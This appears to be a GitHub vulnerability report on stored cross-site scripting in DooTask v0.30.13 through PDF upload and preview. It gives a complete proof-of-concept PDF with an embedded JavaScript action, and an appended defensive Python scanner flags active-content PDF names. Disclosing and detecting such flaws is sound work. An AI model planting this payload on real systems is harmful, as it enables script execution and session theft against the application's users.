Dootask has a cross site scripting vulnerability #210

Open
Lianghao-Chu opened this issue May 4, 2024 · 0 comments
1. Test environment
The testing environment is Windows 10 Home, Chinese version.
The version is as follows:
Test version: dootask demonstration environment; dootask v0.30.13

2. Vulnerability Description
dooTask is a lightweight open source online project task management tool that provides various document collaboration tools, online mind maps, online flowcharts, project management, task distribution, real-time IM, file management, and more.
dooTask v0.30.13 and below have a cross-site scripting vulnerability. The vulnerability stems from the application's lack of effective filtering and escaping of user-provided data, combined with the file upload and online preview functions the system provides. Attackers can exploit this vulnerability by injecting carefully designed payloads to execute arbitrary web scripts or HTML.

3. POC
3.1 Function points
File - Upload File - Click to View
3.2 XSS vulnerability hazards
After a successful attack using XSS code, malicious users may gain high privileges. XSS vulnerabilities mainly pose the following hazards:
(1) Stealing various user accounts;
(2) Stealing user cookie information and impersonating the user's identity to enter the website;
(3) Hijacking user sessions and performing arbitrary operations, i.e. operating the user's browser;
(4) Streaming display, executing commercial advertisements;
(5) Spreading worms;
and so on.
3.3 POC process
We first write the following code into a text file, and then change the file suffix to pdf; here we name it joy.pdf. The following code can execute XSS attacks, and when the attack is successfully executed, the user will receive an XSS pop-up window. Afterwards, upload the file to the system through the function points and view it.

%PDF-1.3
%âãÏÓ
1 0 obj
<<
/Type /Pages
/Count 1
/Kids [ 4 0 R ]
>>
endobj
2 0 obj
<<
/Producer (PyPDF2)
>>
endobj
3 0 obj
<<
/Type /Catalog
/Pages 1 0 R
/Names <<
/JavaScript <<
/Names [ (0b1781f6\0559e7f\0554c59\055b8fd\0557c4588f0d14c) 5 0 R ]
>>
>>
>>
endobj
4 0 obj
<<
/Type /Page
/Resources <<
>>
/MediaBox [ 0 0 72 72 ]
/Parent 1 0 R
>>
endobj
5 0 obj
<<
/Type /Action
/S /JavaScript
/JS (app\056alert\050\047xss\047\051\073)
>>
endobj
xref
0 6
0000000000 65535 f 
0000000015 00000 n 
0000000074 00000 n 
0000000114 00000 n 
0000000262 00000 n 
0000000350 00000 n 
trailer
<<
/Size 6
/Root 3 0 R
/Info 2 0 R
>>
startxref
445
%%EOF

3.4 POC results
[screenshots not reproduced]

4. Repair plan

  1. It is recommended not to enable the online viewing function for PDF and HTML; clicking should directly view the source file.
  2. Update the PDF reader: update the version of the PDF reader in a timely manner to obtain the latest security fixes and vulnerability patches.
  3. Restrict the source of PDF files: download PDF files only from trusted sources to avoid downloading and opening unknown or suspicious PDF files.
  4. Use security reader plugins: install security reader plugins that can provide additional security protection and vulnerability detection functions.
  5. Regularly review PDF files: regularly review downloaded PDF files and delete files that may contain malicious script code.
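The PoC in section 3.3 works because the uploaded PDF carries a /JavaScript name tree and a /JS action that the online previewer executes, and repair step 1 is essentially "do not render uploads inline". The following is an added example, written for this page and not code from the issue or from the DooTask project, of the server-side check a file-serving endpoint could run on uploads: it decodes PDF name tokens (including #xx hex-escaped spellings), inflates FlateDecode streams so object streams are scanned too, and refuses to serve any file with active content inline. The function names, the active-content name list and the sample PDFs are constructed for the example; the first sample mirrors the structure of the PoC above.

```python
import re
import zlib

# PDF name tokens whose presence means the document carries active content that
# a browser-side or server-side previewer might execute (JavaScript actions,
# open actions, additional-action dictionaries, launch actions, rich media).
# Assumed list for this example, not a complete catalogue.
ACTIVE_CONTENT_NAMES = {"JavaScript", "JS", "OpenAction", "AA", "Launch", "RichMedia"}

_NAME_RE = re.compile(rb"/([^\s/\[\]<>(){}%]+)")
_STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
_HEX_ESCAPE_RE = re.compile(r"#([0-9A-Fa-f]{2})")


def normalise_name(raw: bytes) -> str:
    """Decode a PDF name token, resolving #xx hex escapes so that an
    obfuscated spelling such as /J#61vaScript compares equal to /JavaScript."""
    text = raw.decode("latin-1")
    return _HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), text)


def _inflate_streams(pdf: bytes):
    """Yield the inflated body of every stream zlib can decode, so dictionaries
    hidden inside FlateDecode streams (e.g. object streams) are scanned too.
    Streams that are not zlib-compressed are skipped."""
    for match in _STREAM_RE.finditer(pdf):
        try:
            yield zlib.decompressobj().decompress(match.group(1))
        except zlib.error:
            continue


def find_active_content(pdf: bytes) -> set[str]:
    """Return the set of active-content names found anywhere in the file,
    raw bytes and inflated streams alike. An empty set means none was found."""
    found = set()
    for blob in [pdf, *_inflate_streams(pdf)]:
        for match in _NAME_RE.finditer(blob):
            name = normalise_name(match.group(1))
            if name in ACTIVE_CONTENT_NAMES:
                found.add(name)
    return found


def headers_for_serving(pdf: bytes, filename: str) -> dict[str, str]:
    """Build the response headers for an uploaded PDF (hypothetical helper).
    Files with active content are only ever offered as a download, matching
    repair step 1; nosniff stops the browser from re-interpreting the body."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    disposition = "attachment" if find_active_content(pdf) else "inline"
    return {
        "Content-Type": "application/pdf",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'{disposition}; filename="{safe_name}"',
    }


# Constructed samples (not files from the issue). POC_LIKE mirrors the PoC
# layout above; OBFUSCATED hides the same names behind #xx escapes; COMPRESSED
# puts an /OpenAction inside a FlateDecode stream; BENIGN has a plain page only.
POC_LIKE = b"""%PDF-1.3
3 0 obj
<< /Type /Catalog /Pages 1 0 R /Names << /JavaScript << /Names [ (x) 5 0 R ] >> >> >>
endobj
5 0 obj
<< /Type /Action /S /JavaScript /JS (app\\056alert\\050\\047xss\\047\\051\\073) >>
endobj
%%EOF
"""
OBFUSCATED = b"""%PDF-1.3
5 0 obj
<< /Type /Action /S /J#61vaScript /#4AS (x) >>
endobj
%%EOF
"""
BENIGN = b"""%PDF-1.3
4 0 obj
<< /Type /Page /MediaBox [ 0 0 72 72 ] /Parent 1 0 R >>
endobj
%%EOF
"""


def _flate_wrapped(inner: bytes) -> bytes:
    """Wrap a dictionary in a FlateDecode stream object (constructed sample)."""
    body = zlib.compress(inner)
    return (b"%PDF-1.5\n7 0 obj\n<< /Type /ObjStm /Length " + str(len(body)).encode()
            + b" /Filter /FlateDecode >>\nstream\n" + body + b"\nendstream\nendobj\n%%EOF\n")


COMPRESSED = _flate_wrapped(b"<< /OpenAction << /S /JavaScript /JS (x) >> >>")

if __name__ == "__main__":
    for label, sample in [("poc-like", POC_LIKE), ("obfuscated", OBFUSCATED),
                          ("compressed", COMPRESSED), ("benign", BENIGN)]:
        print(label, sorted(find_active_content(sample)),
              headers_for_serving(sample, "joy.pdf")["Content-Disposition"])
```

The scan is a pattern check, not a full PDF parser: it will miss names split across incremental updates or encrypted documents, so it belongs in front of, not instead of, the stronger control of never rendering user uploads in the application's own origin.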